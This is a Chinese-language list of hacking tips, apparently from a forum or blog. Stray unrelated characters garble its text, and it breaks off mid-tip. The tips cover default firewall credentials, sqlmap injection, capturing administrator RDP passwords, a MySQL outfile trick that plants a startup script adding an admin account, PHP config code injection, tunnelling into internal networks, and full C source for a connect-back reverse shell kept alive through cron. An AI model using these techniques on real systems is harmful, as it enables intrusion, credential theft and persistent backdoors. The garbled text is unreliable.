來(lái)源：By：xiaopiao

1誊锭、Juniper（瞻博）防火墻的默認(rèn)賬號(hào)密碼為：netscreen/netscreen

2、以下apache存在header injection漏洞：1.3.34/2.0.57/2.2.1

3捌臊、利用sqlmap進(jìn)行POST注入：./sqlmap.py -u "http://test.com/admin/test.php" --data "參數(shù)_1=a&參數(shù)_2=b" -p "參數(shù)_1"復(fù)制代碼

4粟誓、一個(gè)小技巧：面對(duì)win主機(jī)轩褐，如果發(fā)現(xiàn)目標(biāo)有被入侵過(guò)的端倪没宾，而又開(kāi)著3389，進(jìn)去試一下連敲5個(gè)Shift淫痰，人參無(wú)處不驚喜白羁！

5黑界、遇到目標(biāo)有很多個(gè)C段的情況管嬉，尋找E-mail域名所在的C段皂林，往往mail服務(wù)器所在的C段為最核心的功能段朗鸠。

6、GetHashes础倍、Pwdump烛占、WCE等工具dump不了hash？那就試試使用WinlogonHack記錄管理員登陸3389時(shí)的密碼吧沟启！下載之后將安裝程序文件Hookmsgina.dll忆家、install.bat、On.reg以及ReadLog.bat復(fù)制到一個(gè)相同文件夾下面德迹，然后在Dos提示符或者GUI界面寫(xiě)直接運(yùn)行install.bat即可芽卿。執(zhí)行完畢后不需要重啟，當(dāng)有3389登上時(shí)胳搞，自動(dòng)加載DLL卸例，并且記錄登錄密碼！管理員的登陸密碼保存在系統(tǒng)system32目錄的boot.dat文件中肌毅。

7筷转、GetHashs和saminside有些時(shí)候獲取不到Hash，可能的原因是管理員的密碼過(guò)長(zhǎng)悬而，可以使用上一條的那種方法來(lái)獲取呜舒。

8、如果能從Google搜索出一個(gè)網(wǎng)站具有黑客留下來(lái)的Webshell笨奠，那這個(gè)網(wǎng)站十有八九具有漏洞（這是廢話~~~）袭蝗，具體來(lái)說(shuō)有列目錄漏洞。因?yàn)槠渌?yè)面不可能會(huì)有鏈接鏈到Webshell的地址上般婆，所以搜索引擎的爬蟲(chóng)不會(huì)爬到Webshell呻袭，所以最大的可能就是通過(guò)列目錄漏洞暴露出Webshell的地址。

9腺兴、列目錄漏洞的利用無(wú)非幾種：Web編輯器左电、敏感文件（zip、rar、ini篓足、mdb等）段誊、upload頁(yè)面、后臺(tái)管理頁(yè)面......（歡迎留言補(bǔ)充）

10栈拖、讓win自帶的防火墻允許某個(gè)端口進(jìn)出（例如TCP 1234端口）：netsh firewall set portopening TCP 1234 ENABLE復(fù)制代碼

11连舍、關(guān)閉一些危險(xiǎn)的組件,禁止webshell運(yùn)行命令：

（1）regsvr32 /u c:\windows\system32\WSHom.Ocx /s

（2）regsvr32 /u c:\windows\system32\shell32.dll /s

（3）regsvr32 /u c:\windows\system32\scrrun.dll /s復(fù)制代碼開(kāi)啟也很簡(jiǎn)單，尤其是第三個(gè)的FSO組件涩哟，很可能造成網(wǎng)站奔潰索赏，恢復(fù)的方法是regsvr32? c:\windows\system32\scrrun.dll /s復(fù)制代碼

12、在一種很極端的情況下贴彼，你實(shí)在沒(méi)有辦法了潜腻，可以嘗試一下啟動(dòng)項(xiàng)寫(xiě)入VBS腳本提權(quán)。當(dāng)然器仗，條件也十分苛刻：

（1）如果你的Webshell有足夠的權(quán)限融涣，能在用戶(hù)啟動(dòng)目錄里面寫(xiě)入文件

（2）耐心地等待管理員開(kāi)啟機(jī)子

（3）沒(méi)開(kāi)殺毒軟件我們利用Mysql來(lái)outfile出vbs腳本：create table a(cmd text);insert into a values ("set wshshell=createobject(""wscript.shell"")");insert into a values ("a=wshshell.run(""cmd.exe /c net user user password /add"",0)");insert into a values ("a=wshshell.run(""cmd.exe /c net localgroup administrators user /add"",0)");select * from a into outfile "c:\\docume~1\\alluse~1\\[開(kāi)始]菜單\\程序\\啟動(dòng)\\a.vbs";復(fù)制代碼說(shuō)明：insert into a values ("a=wshshell.run(""cmd.exe /c net user user password /add"",0)");里面的“0”意思是不彈出CMD窗口，安靜地運(yùn)行精钮。

13威鹿、PhpSpy 2013 密碼修改

（1）、將加密函數(shù)：function encode_pass($pass) {? ? $k = 'angel';? ? $pass = md5($k.$pass);? ? $pass = md5($pass.$k);? ? $pass = md5($k.$pass.$k);? ? return $pass;復(fù)制代碼最后一行return $pass; 修改為 echo $pass轨香；

（2）忽你、在Login框登陸輸入你的密碼，即可輸出加密好的密碼臂容。

（3）科雳、然后在PhpSpy 2013里修改 $pass的值 就可以了。

13策橘、真實(shí)案例：滲透某站后發(fā)現(xiàn)對(duì)方規(guī)則較變態(tài)炸渡，比如執(zhí)行id,uname-a,等便可判斷為入侵。想了下丽已，通過(guò)Base64編碼繞過(guò)

命令寫(xiě)入文件的方式實(shí)現(xiàn)繞過(guò)（實(shí)際運(yùn)用中要能上傳或者寫(xiě)入文件）

還有其他很多方法蚌堵，即使不能上傳文件，也可以自己’因地制宜’`借`到執(zhí)行命令的字符后反單引號(hào)執(zhí)行沛婴。用的方法是 linux Shell expr linux Shell expr可以參考

http://blog.csdn.net/junjieguo/article/details/729362214吼畏、滲透某站過(guò)程中，進(jìn)了后臺(tái)拿不到shell嘁灯，后臺(tái)配置文件可寫(xiě)泻蚊，便下了源碼研究。

具體代碼：$config["db"]["pass"] = "";$config["db"]["data"] = "phpok";$config["db"]["prefix"] = "

可寫(xiě)入的數(shù)據(jù)";$config["db"]["debug"] = false;

復(fù)制代碼大膽地提交{${phpinfo()}}訪問(wèn)配置文件丑婿，php代碼被解析執(zhí)行了性雄。

原理是php雙引號(hào)的解析執(zhí)行没卸，很多開(kāi)源程序后臺(tái)都可用這個(gè)拿shell喔。

Php雙引號(hào)解析執(zhí)行詳見(jiàn)：http://www.myhack58.com/Article/html/3/68/2013/36620.htm15秒旋、遇到可修改模板的地方约计，看能否修改模板為php后綴，若不行迁筛，考慮畸形文件名煤蚌？

如.php.apk。apache是依舊當(dāng)做PHP執(zhí)行的细卧。

服務(wù)器解析漏洞詳見(jiàn) http://drops.wooyun.org/papers/53916尉桩、曾經(jīng)搞一個(gè)站的后臺(tái)，成功修改模板為.php后綴贪庙，但內(nèi)容過(guò)濾了PHP標(biāo)簽phpinfo() ;

復(fù)制代碼成功寫(xiě)入并解析蜘犁，done.17、reDuh插勤，一個(gè)不錯(cuò)的工具沽瘦，可以映射內(nèi)網(wǎng)端口到http或https端口的http服務(wù)上：服務(wù)端有aps革骨、jsp农尖、php版，具體下載：

http://www.sensepost.com/research/reDuh良哲。

下面簡(jiǎn)單說(shuō)下這個(gè)工具先在服務(wù)器上傳服務(wù)端：訪問(wèn)http://www.xxx.com/shell/reduh.jsp

如下：[reDuhError]Undefined Request說(shuō)明工作正常盛卡。

在本地：D:\Tools\reDuh\0.2\reDuhClient>java reDuhClient www.xxx.com 80 /shell/reduh.jsp[Info]Querying remote JSP for usable remote RPC port[Info]Remote RPC port chosen as 42001[Info]Attempting to start reDuh.jsp from www.xxx.com:80/shell/reduh.jsp and setting remote RPC port to 42001. Please wait…[InfoL]reDuhClient service listener started on local port 1010[InfoL]Caught new service connection on port 1010

本地默認(rèn)監(jiān)聽(tīng)1010端口：D:\Tools>nc -vv 127.0.0.1 1010DNS fwd/rev mismatch: localhost != vitterlocalhost [127.0.0.1] 1010 (?) openWelcome to the reDuh command line>>[createTunnel]5900:192.168.0.3:5900Successfully bound locally to port 5900. Awaiting connections.出現(xiàn)這個(gè)提示就ok了，[createTunnel]

本地映射出的端口:被映射的內(nèi)網(wǎng)ip:被映射的內(nèi)網(wǎng)ip端口然后就可以用vnc連接127.0.0.1的5900端口就是連攻擊內(nèi)網(wǎng)的192.168.0.3的服務(wù)器了筑凫。

18滑沧、如何在webshell反彈后門(mén)回來(lái)后停止apache：由 python -c ’import pty; pty.spawn(“/bin/sh”)’得到一個(gè)可以交互的shell，在有root密碼的前提下可 以su巍实，但是發(fā)現(xiàn)不能停止httpd滓技，因?yàn)檫@個(gè)shell的父進(jìn)程是httpd的，如果httpd被stop后棚潦，發(fā)現(xiàn)后門(mén)直接就掛了令漂。可以crond去跑 這個(gè)后門(mén)得到shell不要用webshell跑丸边，在這個(gè)shell里面停止httpd（因?yàn)樵搩?nèi)網(wǎng)服務(wù)器段只被映射這一個(gè)ip的80端口出來(lái)叠必，現(xiàn)在這個(gè) 80端口要做內(nèi)網(wǎng)映射到網(wǎng)關(guān)上，可以直接遠(yuǎn)程管理設(shè)備妹窖，開(kāi)DMZ之后入侵其他內(nèi)網(wǎng)服務(wù)器）纬朝。本地：nc -l -p 5555服務(wù)器上：[root@cactiez etc]#cat /home/www/haha.c—————————-代碼開(kāi)始分割線—————————–#include#include#include#include#include#include#includeint fd, sock;int port = 5555;struct sockaddr_in addr;char mesg[]? = ”::Connect-Back Backdoor:: CMD: ”;char shell[] = ”/bin/sh”;int main(int argc, char *argv[]) {while(argc<2) {? fprintf(stderr, ” %s”, argv[0]);

exit(0); }

addr.sin_family = AF_INET;

addr.sin_port = htons(port);

addr.sin_addr.s_addr = inet_addr(argv[1]);

fd = socket(AF_INET, SOCK_STREAM, 0);

connect(fd, (struct sockaddr*)&addr, sizeof(addr));

send(fd, mesg, sizeof(mesg), 0);

dup2(fd, 0);

dup2(fd, 1);

dup2(fd, 2);

execl(shell, ”in.telnetd”, 0);

close(fd);return 1;

}

復(fù)制代碼

—————————-代碼結(jié)束分割線—————————–

[root@cactiez etc]# gcc -o /bin/haha /home/www/haha.c

[root@cactiez etc]# mkdir /etc/cr_m

[root@cactiez etc]# cp /home/www/si /etc/cr_m/

[root@cactiez etc]# chmod +x /etc/cr_m/si

[root@cactiez etc]# cat /etc/cr_m/si #!/bin/sh/bin/haha xxx.xxx.xxx.xx

[root@cactiez etc]# echo ”*/1 * * * * root run-parts /etc/cr_m” >> /etc/crontab? #追加一個(gè)crontab每分鐘執(zhí)行

[root@cactiez etc]# cat /etc/crontabSHELL=/bin/bashPATH=/sbin:/bin:/usr/sbin:/usr/binMAILTO=rootHOME=/# run-parts01 * * * * root run-parts /etc/cron.hourly02 4 * * * root run-parts /etc/cron.daily22 4 * * 0 root run-parts /etc/cron.weekly42 4 1 * * root run-parts /etc/cron.monthly*/1 * * * * root run-parts /etc/cr_m

1分鐘后本地nc監(jiān)聽(tīng)的就連上了，然后在這個(gè)里面停止httpd：

[root@cactiez etc]# cat /root/s.sh#!/bin/sh/sbin/service httpd stop/usr/local/bin/proxy 80 192.168.0.1 80sleep 600killall -9 proxy/sbin/service httpd restart

[root@cactiez etc]# /root/s.sh &

現(xiàn)在連接這機(jī)器的公網(wǎng)ip的80端口就已經(jīng)是網(wǎng)關(guān)192.168.0.1的80端口了骄呼，趕緊的設(shè)置DMZ共苛，搞定內(nèi)網(wǎng)機(jī)器判没。

19、曾經(jīng)搞一個(gè)站 無(wú)XSS 無(wú)SQL注入隅茎，只開(kāi)放80端口哆致。用戶(hù)只能上傳圖片文件。有個(gè)物理路徑報(bào)錯(cuò)患膛。

運(yùn)氣好看到了cookie有一個(gè)

language=en

推測(cè)是否服務(wù)端的代碼為